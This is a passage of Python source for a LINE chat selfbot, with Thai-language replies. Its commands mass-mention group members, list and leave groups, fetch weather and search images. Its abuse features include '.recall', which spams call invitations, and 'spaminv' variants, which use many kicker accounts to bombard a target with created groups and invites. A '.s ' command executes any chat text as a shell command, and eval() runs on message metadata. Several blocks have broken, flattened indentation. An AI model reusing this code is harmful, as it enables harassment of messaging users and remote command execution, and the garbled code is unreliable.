                    msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
                    try:
                        line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
                    except:
                        line.sendMessage(msg.to,"[[NO MENTION]]")
                elif data[0] == "<":
                    # "<N": mention only the first N members.
                    mentargs = int(data[1:].strip())
                    group = line.getGroup(msg.to)
                    nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
                    cb = ""
                    cb2 = ""
                    count = 1
                    strt = len(str(count)) + 2
                    akh = int(0)
                    cnt = 0
                    for md in nama:
                        if count > mentargs:
                            break
                        akh = akh + len(str(count)) + 2 + 5
                        cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
                        strt = strt + len(str(count+1)) + 2 + 6
                        akh = akh + 1
                        cb2 += str(count)+". @name\n"
                        cnt = cnt + 1
                        if cnt == 20:
                            cb = (cb[:int(len(cb)-1)])
                            cb2 = cb2[:-1]
                            msg.contentType = 0
                            msg.text = cb2
                            msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
                            try:
                                line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
                            except:
                                line.sendMessage(msg.to,"[[NO MENTION]]")
                            cb = ""
                            cb2 = ""
                            strt = len(str(count)) + 2
                            akh = int(0)
                            cnt = 0
                        count += 1
                    cb = (cb[:int(len(cb)-1)])
                    cb2 = cb2[:-1]
                    msg.contentType = 0
                    msg.text = cb2
                    msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
                    try:
                        line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
                    except:
                        line.sendMessage(msg.to,"[[NO MENTION]]")
                elif data[0] == ">":
                    # ">N": mention members starting at number N.
                    mentargs = int(data[1:].strip())
                    group = line.getGroup(msg.to)
                    nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
                    cb = ""
                    cb2 = ""
                    count = 1
                    if mentargs >= 0:
                        strt = len(str(mentargs)) + 2
                    else:
                        strt = len(str(count)) + 2
                    akh = int(0)
                    cnt = 0
                    for md in nama:
                        if count < mentargs:
                            count += 1
                            continue
                        akh = akh + len(str(count)) + 2 + 5
                        cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
                        strt = strt + len(str(count+1)) + 2 + 6
                        akh = akh + 1
                        cb2 += str(count)+". @name\n"
                        cnt = cnt + 1
                        if cnt == 20:
                            cb = (cb[:int(len(cb)-1)])
                            cb2 = cb2[:-1]
                            msg.contentType = 0
                            msg.text = cb2
                            msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
                            try:
                                line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
                            except:
                                line.sendMessage(msg.to,"[[NO MENTION]]")
                            cb = ""
                            cb2 = ""
                            strt = len(str(count)) + 2
                            akh = int(0)
                            cnt = 0
                        count += 1
                    cb = (cb[:int(len(cb)-1)])
                    cb2 = cb2[:-1]
                    msg.contentType = 0
                    msg.text = cb2
                    msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
                    try:
                        line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
                    except:
                        line.sendMessage(msg.to,"[[NO MENTION]]")
                elif data[0] == "=":
                    # "=N": mention exactly member number N.
                    mentargs = int(data[1:].strip())
                    group = line.getGroup(msg.to)
                    nama = [contact.mid for contact in group.members if contact.mid != zxcvzx]
                    cb = ""
                    cb2 = ""
                    count = 1
                    akh = int(0)
                    cnt = 0
                    for md in nama:
                        if count != mentargs:
                            count += 1
                            continue
                        akh = akh + len(str(count)) + 2 + 5
                        strt = len(str(count)) + 2
                        cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
                        strt = strt + len(str(count+1)) + 2 + 6
                        akh = akh + 1
                        cb2 += str(count)+". @name\n"
                        cnt = cnt + 1
                        if cnt == 20:
                            cb = (cb[:int(len(cb)-1)])
                            cb2 = cb2[:-1]
                            msg.contentType = 0
                            msg.text = cb2
                            msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
                            try:
                                line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
                            except:
                                line.sendMessage(msg.to,"[[NO MENTION]]")
                            cb = ""
                            cb2 = ""
                            strt = len(str(count)) + 2
                            akh = int(0)
                            cnt = 0
                        count += 1
                    cb = (cb[:int(len(cb)-1)])
                    cb2 = cb2[:-1]
                    msg.contentType = 0
                    msg.text = cb2
                    msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
                    try:
                        line.sendMessage(msg.to,text = cb2,contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'},contentType = 0)
                    except:
                        line.sendMessage(msg.to,"[[NO MENTION]]")
        # "ห้องใคร" ("whose room"): group-only. Reports creator, creation time,
        # member/pending counts, QR ticket state, plus group picture and the
        # creator's contact card.
        elif cmd == 'ห้องใคร':
            if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถดูข้อมูลกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
            group = line.getGroup(to)
            try:
                ccreator = group.creator.mid
                gcreator = group.creator.displayName
            except:
                # Creator can be absent (e.g. account deleted).
                ccreator = None
                gcreator = 'Not found'
            if not group.invitee:
                pendings = 0
            else:
                pendings = len(group.invitee)
            qr = 'Close' if group.preventedJoinByTicket else 'Open'
            if group.preventedJoinByTicket:
                ticket = 'Not found'
            else:
                ticket = 'https://line.me/R/ti/g/' + str(line.reissueGroupTicket(group.id))
            # createdTime is epoch milliseconds.
            created = time.strftime('%d-%m-%Y %H:%M:%S', time.localtime(int(group.createdTime) / 1000))
            path = 'http://dl.profile.line-cdn.net/' + group.pictureStatus
            res = '╭───🍁 ตรวจสอบ ควยสร้างห้อง 🍁'
            res += '\n├🙄 ไอดี : ' + group.id
            res += '\n├🙄 ชื่อ : ' + group.name
            res += '\n├🙄 ควยสร้าง : ' + gcreator
            res += '\n├🙄 วันที่เวลา : ' + created
            res += '\n├🙄 ควยทั้งหมด ในห้อง : ' + str(len(group.members))
            res += '\n├🙄 ควยที่ค้าง เชิญ : ' + str(pendings)
            res += '\n├🙄 QR Status : ' + qr
            res += '\n├🙄 Ticket : ' + ticket
            res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
            line.sendImageWithURL(to, path)
            if ccreator:
                line.sendContact(to, ccreator)
            line.sendMessage(to, res)
        # "กลุ่ม" ("group"): list joined groups (paged by 200) and support
        # "leave <num/name/all>" to leave them via the kicker accounts.
        elif cmd.startswith('กลุ่ม'):
            textt = removeCmd(text, setKey)
            texttl = textt.lower()
            gids = line.getGroupIdsJoined()
            gnames = []
            ress = []
            res = '╭───🍁ตรวจสอบควยสร้างห้อง🍁'
            res += '\n❂ List:'
            if gids:
                groups = line.getGroups(gids)
                no = 0
                if len(groups) > 200:
                    parsed_len = len(groups)//200+1
                    for point in range(parsed_len):
                        for group in groups[point*200:(point+1)*200]:
                            no += 1
                            res += '\n❂ %i. %s//%i' % (no, group.name, len(group.members))
                            gnames.append(group.name)
                        if res:
                            if res.startswith('\n'): res = res[1:]
                            if point != parsed_len - 1:
                                ress.append(res)
                            if point != parsed_len - 1:
                                res = ''
                else:
                    for group in groups:
                        no += 1
                        res += '\n❂ %i. %s//%i' % (no, group.name, len(group.members))
                        gnames.append(group.name)
            else:
                res += '\n❂👊Nothing'
            res += '\n❂👊 Usage:'
            res += '\n❂🍁 {key}กลุ่ม'
            res += '\n❂🍁 {key}กลุ่ม Leave <num/name/all>'
            res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
            ress.append(res)
            # NOTE(review): 'กลุ่ม1' never equals cmd 'กลุ่ม'; the bare command
            # falls through to the final else, which sends the same listing.
            if cmd == 'กลุ่ม1':
                for res in ress:
                    line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
            elif texttl.startswith('leave '):
                texts = textt[6:].split(', ')
                leaved = []
                if not gids:
                    return line.sendMessage(to, 'ไม่สามารถออกลุ่มได้\nไม่พบชื่อกลุ่มนี้')
                for texxt in texts:
                    num = None
                    name = None
                    try:
                        num = int(texxt)
                    except ValueError:
                        name = texxt
                    if num != None:
                        if num <= len(groups) and num > 0:
                            group = groups[num - 1]
                            if group.id in leaved:
                                line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
                                continue
                            kicker.leaveGroup(group.id)
                            leaved.append(group.id)
                            if to not in leaved:
                                line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
                        else:
                            line.sendMessage(to, 'Failed leave group number %i, เลขเกิน!' % num)
                    elif name != None:
                        if name in gnames:
                            group = groups[gnames.index(name)]
                            if group.id in leaved:
                                line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
                                continue
                            kicker.leaveGroup(group.id)
                            leaved.append(group.id)
                            if to not in leaved:
                                line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
                        elif name.lower() == 'all':
                            # "all": every kicker account leaves every joined group.
                            for gid in gids:
                                if gid in leaved:
                                    continue
                                kicker.leaveGroup(gid)
                                kicker2.leaveGroup(gid)
                                kicker3.leaveGroup(gid)
                                kicker4.leaveGroup(gid)
                                kicker5.leaveGroup(gid)
                                kicker6.leaveGroup(gid)
                                kicker7.leaveGroup(gid)
                                kicker8.leaveGroup(gid)
                                kicker9.leaveGroup(gid)
                                kicker10.leaveGroup(gid)
                                leaved.append(gid)
                                #time.sleep(0.8)
                            if to not in leaved:
                                line.sendMessage(to, 'ออกทุกกลุ่มเรียบร้อย ♪')
                        else:
                            line.sendMessage(to, 'ไม่สามารถออกกลุ่มชื่อ `%s`นี้ได้\nไม่พบชื่อกลุ่มนี้ ♪' % name)
            else:
                for res in ress:
                    line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('ห้องรัน'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
gids = line.getGroupIdsInvited()
gnames = []
ress = []
res = '╭───🌷 การเชิญ กลุ่ม 🌷'
res += '\n├🍁 List:'
if gids:
groups = line.getGroups(gids)
no = 0
if len(groups) > 200:
parsed_len = len(groups)//200+1
for point in range(parsed_len):
for group in groups[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for group in groups:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
else:
res += '\n│ Nothing'
res += '\n├🍁 Usage : '
res += '\n│👊 {key}ห้องรัน'
res += '\n│👊 {key}ห้องรัน เข้า ❪ พิมพ์/ทั้งหมด ❫'
res += '\n│👊 {key}ห้องรัน ลบ ❪ พิมพ์/ทั้งหมด ❫'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
ress.append(res)
if cmd == 'ห้องรัน':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('เข้า '):
texts = textt[7:].split(', ')
accepted = []
if not gids:
return line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้\nไม่มีคำเชิญเข้ากลุ่ม')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in accepted:
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
continue
line.acceptGroupInvitation(group.id)
accepted.append(group.id)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
else:
line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้ เนื่องจากมายเลข %i นี้มากว่าคำเชิญที่คุณมี' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in accepted:
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
continue
line.acceptGroupInvitation(group.id)
accepted.append(group.id)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
elif name.lower() == 'ทั้งหมด':
for gid in gids:
if gid in accepted:
continue
line.acceptGroupInvitation(gid)
accepted.append(gid)
time.sleep(0.8)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่มทั้งหมดแล้ว ♪')
else:
line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้ `%s`, ไม่พบชื่อกลุ่มนี้ ♪' % name)
elif texttl.startswith('ลบ '):
texts = textt[7:].split(', ')
rejected = []
if not gids:
return line.sendMessage(to, 'ไม่สามารถคำเชิญเข้าร่วมกลุ่มได้\nไม่มีคำเชิญเข้าร่วมกลุ่ม')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in rejected:
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
continue
line.rejectGroupInvitation(group.id)
rejected.append(group.id)
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
else:
line.sendMessage(to, 'ไม่สามายกเลิกค้างเชิญหมายเลข %iนี้ได้เนื่องจากเลขเกิน!' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in rejected:
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
continue
line.rejectGroupInvitation(group.id)
rejected.append(group.id)
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
elif name.lower() == 'ทั้งหมด':
for gid in gids:
if gid in rejected:
continue
line.rejectGroupInvitation(gid)
rejected.append(gid)
time.sleep(0.8)
line.sendMessage(to, 'ยกเลิกคำเชิญเข้าร่วมกลุ่มทั้งหมดแล้ว ♪')
else:
line.sendMessage(to, 'ไม่สามารถยกเลิกคำเชิญเข้าร่วมกลุ่มชื่อ`%s`นี้ได้เนื่องจากไม่พบชื่อกลุ่มนี้ ♪' % name)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
        # "สมาชิก" ("members"): list every member of the current room/group,
        # flushing a message per 200 names.
        elif cmd == 'สมาชิก':
            if msg.toType == 1:
                room = line.getRoom(to)
                members = room.contacts
            elif msg.toType == 2:
                group = line.getGroup(to)
                members = group.members
            else:
                return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนสมาชิกในกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
            if not members:
                return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนสมาชิกในกลุ่มได้\nไม่มีสมาชิกในกลุ่ม')
            res = '╭───🍁 ข้อมูลเพื่อน ฉัน 🍁'
            parsed_len = len(members)//200+1
            no = 0
            for point in range(parsed_len):
                for member in members[point*200:(point+1)*200]:
                    no += 1
                    res += '\n│ %i. %s' % (no, member.displayName)
                    if member == members[-1]:
                        # Close the frame on the very last member.
                        res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
                if res:
                    if res.startswith('\n'): res = res[1:]
                    line.sendMessage(to, res)
                res = ''
        # "ค้างเชิญ" ("pending invites"): group-only; list users invited to the
        # group who have not yet joined, flushing a message per 200 names.
        elif cmd == 'ค้างเชิญ':
            if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนค้างเชิญในกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
            group = line.getGroup(to)
            members = group.invitee
            if not members:
                return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนค้างเชิญในกลุ่มได้\nไม่พบค้างเชิญ')
            res = '╭───🍁 ค้างเชิญ สมาชิก 🍁'
            parsed_len = len(members)//200+1
            no = 0
            for point in range(parsed_len):
                for member in members[point*200:(point+1)*200]:
                    no += 1
                    res += '\n│ %i. %s' % (no, member.displayName)
                    if member == members[-1]:
                        res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
                if res:
                    if res.startswith('\n'): res = res[1:]
                    line.sendMessage(to, res)
                res = ''
        # "เปิดลิ้ง" ("open link"): group-only; enable join-by-QR-ticket.
        elif cmd == 'เปิดลิ้ง':
            if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปิดลิ้งกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
            group = line.getGroup(to)
            group.preventedJoinByTicket = False
            line.updateGroup(group)
            line.sendMessage(to, 'ได้ทำการเปิดลิ้งกลุ่มแล้วเจ้านาย')
        # "im <query>": image search via an external service, sending each hit.
        # NOTE(review): the query is interpolated into the URL without URL-encoding,
        # so queries with spaces/special characters may fail — confirm acceptable.
        elif "im " in msg.text.lower():
            query = msg.text.replace("im ","")
            r = requests.get("https://cryptic-ridge-9197.herokuapp.com/api/imagesearch/" + query + "?offset=1")
            data=r.text
            data=json.loads(r.text)
            if data != []:
                for food in data:
                    line.sendImageWithURL(msg.to, str(food["url"]))
elif msg.text.lower() == "/gift":
msg.contentType = 9
msg.contentMetadata={'PRDID': '','PRDTYPE': 'THEME','MSGTPL': '1'}
msg.text = None
line.sendMessage(msg.to,text = None,contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'},contentType = 9)
elif "/gift " in msg.text.lower():
red = re.compile(re.escape('.gift '),re.IGNORECASE)
themeid = red.sub('',msg.text)
msg.contentType = 9
msg.contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'}
msg.text = None
line.sendMessage(msg.to,text = None,contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'},contentType = 9)
        # "weather:<city>": fetch and post weather for a fixed set of Thai cities.
        # The numeric argument to url_builder is the city id; the trailing int
        # selects the output variant. Replies go to the chat, or to the sender
        # for 1:1 chats (toType 0).
        elif msg.text.lower() == "weather:chiangmai":
            if msg.toType != 0:
                data_output(msg.to,data_organizer(data_fetch(url_builder(1153670))),1)
            else:
                data_output(msg.from_,data_organizer(data_fetch(url_builder(1153670))),1)
        elif msg.text.lower() == "weather:ubonratchathani":
            if msg.toType != 0:
                data_output(msg.to,data_organizer(data_fetch(url_builder(1605245))),2)
            else:
                data_output(msg.from_,data_organizer(data_fetch(url_builder(1605245))),2)
        elif msg.text.lower() == "weather:bangkok":
            if msg.toType != 0:
                data_output(msg.to,data_organizer(data_fetch(url_builder(1609350))),3)
            else:
                data_output(msg.from_,data_organizer(data_fetch(url_builder(1609350))),3)
        elif msg.text.lower() == "weather:phetchabun":
            if msg.toType != 0:
                data_output(msg.to,data_organizer(data_fetch(url_builder(1607737))),4)
            else:
                data_output(msg.from_,data_organizer(data_fetch(url_builder(1607737))),4)
        elif msg.text.lower() == "weather:khon kaen":
            if msg.toType != 0:
                data_output(msg.to,data_organizer(data_fetch(url_builder(1609776))),5)
            else:
                data_output(msg.from_,data_organizer(data_fetch(url_builder(1609776))),5)
        elif msg.text.lower() == "weather:ayutthaya":
            if msg.toType != 0:
                data_output(msg.to,data_organizer(data_fetch(url_builder(1607532))),6)
            else:
                data_output(msg.from_,data_organizer(data_fetch(url_builder(1607532))),6)
        elif msg.text.lower() in ["weather"]:
            # Bare "weather": show the list of supported cities.
            if msg.toType != 0:
                line.sendMessage(msg.to,"สภาพอากาศในแต่ละจังหวัด\n- chiangmai\n- ubonratchathani\n- bangkok\n- phetchabun\n-khon kaen\n-ayutthaya\nพิมพ์ \"weather:[ชื่อจังหวัด]\" เพื่อดูข้อมูลสภาพอากาศ")
            else:
                line.sendMessage(msg.to,"สภาพอากาศในแต่ละจังหวัด\n- chiangmai\n- ubonratchathani\n- bangkok\n- phetchabun\n-khon kaen\n-ayutthaya\nพิมพ์ \"weather:[ชื่อจังหวัด]\" เพื่อดูข้อมูลสภาพอากาศ")
        #-----------------------------------------------------------
        # ".recall <N> [@mention]": group-only; spam N group-call invitations,
        # either to the first mentioned user or to every member.
        elif msg.text.lower().startswith(".recall"):
            if msg.toType == 2:
                reps = int(msg.text.split(" ")[1])
                asup = [g1.adityasplittext(msg.text,'s').replace('{} '.format(reps),'')]*reps
                # NOTE(review): `in dict.keys() != None` is a Python chained
                # comparison; it happens to behave like a plain membership test
                # only because the second comparison is always True — confirm.
                if 'MENTION' in msg.contentMetadata.keys()!=None:
                    # HACK: eval() on attacker-influenced message metadata.
                    key = eval(msg.contentMetadata["MENTION"])
                    key1 = key["MENTIONEES"][0]["M"]
                    nama = [key1]
                    g1.sendMessage(to,"กำลังดำเนินการ...")
                    babu = [g1.call.inviteIntoGroupCall(to,nama,mediaType=2) for babu in asup] ; g1.sendMessage(to,"เชิญคอลสำเร็จแล้ว!")
                else:
                    g1.sendMessage(to,"กำลังดำเนินการ...")
                    group = g1.getGroup(to);nama = [contact.mid for contact in group.members]; babu = [g1.call.inviteIntoGroupCall(to,nama,mediaType=2) for babu in asup] ; g1.sendMessage(to,"เชิญคอลสำเร็จแล้ว!")
            else:
                g1.sendMessage(to,"คำสั่งนี้สามารถใช้ได้เฉพาะกลุ่ม")
        # "spaminv <count>-<name>-<mid>": using the `kicker` account, create
        # <count> groups called <name> containing <mid>, then re-invite the
        # target to every pre-existing kicker group with that name.
        elif cmd.startswith("spaminv "):
            aa = cmd.replace("spaminv ","")
            bb = aa.split("-")
            count = int(bb[0])
            name = str(bb[1])
            target = bb[2]
            grup = kicker.groups
            try:
                kicker.findAndAddContactsByMid(target)
            except:
                pass
            for anu in range(count):
                kicker.createGroup(name, [target])
            for i in grup:
                group = kicker.getGroup(i)
                if group.name == name:
                    kicker.inviteIntoGroup(group.id, [target])
                    print("Inviting to group %s"%anu)
            print("Sukses mank")
            line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker.getContact(target).displayName, name, count))
        # "spaminv2".."spaminv6": identical clones of "spaminv" above, each
        # driven by the corresponding kicker2..kicker6 account.
        elif cmd.startswith("spaminv2 "):
            aa = cmd.replace("spaminv2 ","")
            bb = aa.split("-")
            count = int(bb[0])
            name = str(bb[1])
            target = bb[2]
            grup = kicker2.groups
            try:
                kicker2.findAndAddContactsByMid(target)
            except:
                pass
            for anu in range(count):
                kicker2.createGroup(name, [target])
            for i in grup:
                group = kicker2.getGroup(i)
                if group.name == name:
                    kicker2.inviteIntoGroup(group.id, [target])
                    print("Inviting to group %s"%anu)
            print("Sukses mank")
            line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker2.getContact(target).displayName, name, count))
        elif cmd.startswith("spaminv3 "):
            aa = cmd.replace("spaminv3 ","")
            bb = aa.split("-")
            count = int(bb[0])
            name = str(bb[1])
            target = bb[2]
            grup = kicker3.groups
            try:
                kicker3.findAndAddContactsByMid(target)
            except:
                pass
            for anu in range(count):
                kicker3.createGroup(name, [target])
            for i in grup:
                group = kicker3.getGroup(i)
                if group.name == name:
                    kicker3.inviteIntoGroup(group.id, [target])
                    print("Inviting to group %s"%anu)
            print("Sukses mank")
            line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker3.getContact(target).displayName, name, count))
        elif cmd.startswith("spaminv4 "):
            aa = cmd.replace("spaminv4 ","")
            bb = aa.split("-")
            count = int(bb[0])
            name = str(bb[1])
            target = bb[2]
            grup = kicker4.groups
            try:
                kicker4.findAndAddContactsByMid(target)
            except:
                pass
            for anu in range(count):
                kicker4.createGroup(name, [target])
            for i in grup:
                group = kicker4.getGroup(i)
                if group.name == name:
                    kicker4.inviteIntoGroup(group.id, [target])
                    print("Inviting to group %s"%anu)
            print("Sukses mank")
            line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker4.getContact(target).displayName, name, count))
        elif cmd.startswith("spaminv5 "):
            aa = cmd.replace("spaminv5 ","")
            bb = aa.split("-")
            count = int(bb[0])
            name = str(bb[1])
            target = bb[2]
            grup = kicker5.groups
            try:
                kicker5.findAndAddContactsByMid(target)
            except:
                pass
            for anu in range(count):
                kicker5.createGroup(name, [target])
            for i in grup:
                group = kicker5.getGroup(i)
                if group.name == name:
                    kicker5.inviteIntoGroup(group.id, [target])
                    print("Inviting to group %s"%anu)
            print("Sukses mank")
            line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker5.getContact(target).displayName, name, count))
        elif cmd.startswith("spaminv6 "):
            aa = cmd.replace("spaminv6 ","")
            bb = aa.split("-")
            count = int(bb[0])
            name = str(bb[1])
            target = bb[2]
            grup = kicker6.groups
            try:
                kicker6.findAndAddContactsByMid(target)
            except:
                pass
            for anu in range(count):
                kicker6.createGroup(name, [target])
            for i in grup:
                group = kicker6.getGroup(i)
                if group.name == name:
                    kicker6.inviteIntoGroup(group.id, [target])
                    print("Inviting to group %s"%anu)
            print("Sukses mank")
            line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker6.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv7 "):
aa = cmd.replace("spaminv7 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker7.groups
try:
kicker7.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker8.createGroup(name, [target])
for i in grup:
group = kicker8.getGroup(i)
if group.name == name:
kicker8.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker7.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv8 "):
    # Invite-spam.  NOTE(review): despite the "8" label this branch drives the
    # kicker9 account throughout (and spaminv9 drives kicker10, spaminv10
    # drives g1, spaminv11 drives kicker7) — the command-number-to-account
    # mapping is shifted; confirm whether that is intentional.
    aa = cmd.replace("spaminv8 ","")
    bb = aa.split("-")
    count = int(bb[0])
    name = str(bb[1])
    target = bb[2]
    grup = kicker9.groups
    try:
        kicker9.findAndAddContactsByMid(target)
    except:
        pass
    for anu in range(count):
        kicker9.createGroup(name, [target])
        for i in grup:
            group = kicker9.getGroup(i)
            if group.name == name:
                kicker9.inviteIntoGroup(group.id, [target])
                print("Inviting to group %s"%anu)
    print("Sukses mank")
    line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker9.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv9 "):
    # Invite-spam via the kicker10 account (label/account shift — see above).
    aa = cmd.replace("spaminv9 ","")
    bb = aa.split("-")
    count = int(bb[0])
    name = str(bb[1])
    target = bb[2]
    grup = kicker10.groups
    try:
        kicker10.findAndAddContactsByMid(target)
    except:
        pass
    for anu in range(count):
        kicker10.createGroup(name, [target])
        for i in grup:
            group = kicker10.getGroup(i)
            if group.name == name:
                kicker10.inviteIntoGroup(group.id, [target])
                print("Inviting to group %s"%anu)
    print("Sukses mank")
    line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker10.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv10 "):
    # Invite-spam via the g1 account.
    aa = cmd.replace("spaminv10 ","")
    bb = aa.split("-")
    count = int(bb[0])
    name = str(bb[1])
    target = bb[2]
    grup = g1.groups
    try:
        g1.findAndAddContactsByMid(target)
    except:
        pass
    for anu in range(count):
        g1.createGroup(name, [target])
        for i in grup:
            group = g1.getGroup(i)
            if group.name == name:
                g1.inviteIntoGroup(group.id, [target])
                print("Inviting to group %s"%anu)
    print("Sukses mank")
    line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(g1.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv11 "):
    # Invite-spam via the kicker7 account.
    aa = cmd.replace("spaminv11 ","")
    bb = aa.split("-")
    count = int(bb[0])
    name = str(bb[1])
    target = bb[2]
    grup = kicker7.groups
    try:
        kicker7.findAndAddContactsByMid(target)
    except:
        pass
    for anu in range(count):
        kicker7.createGroup(name, [target])
        for i in grup:
            group = kicker7.getGroup(i)
            if group.name == name:
                kicker7.inviteIntoGroup(group.id, [target])
                print("Inviting to group %s"%anu)
    print("Sukses mank")
    line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker7.getContact(target).displayName, name, count))
elif ".s " in msg.text.lower():
spl = re.split(".s ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
try:
line.sendMessage(to,subprocess.getoutput(spl[1]))
except:
pass
elif cmd == 'ปิดลิ้ง':
    # Close the group's join-by-ticket (QR/link) entrance.  Group chats only.
    if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปิดลิ้งกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
    group = line.getGroup(to)
    group.preventedJoinByTicket = True
    line.updateGroup(group)
    line.sendMessage(to, 'ได้ทำการปิดลิ้งกลุ่มแล้วเจ้านาย')
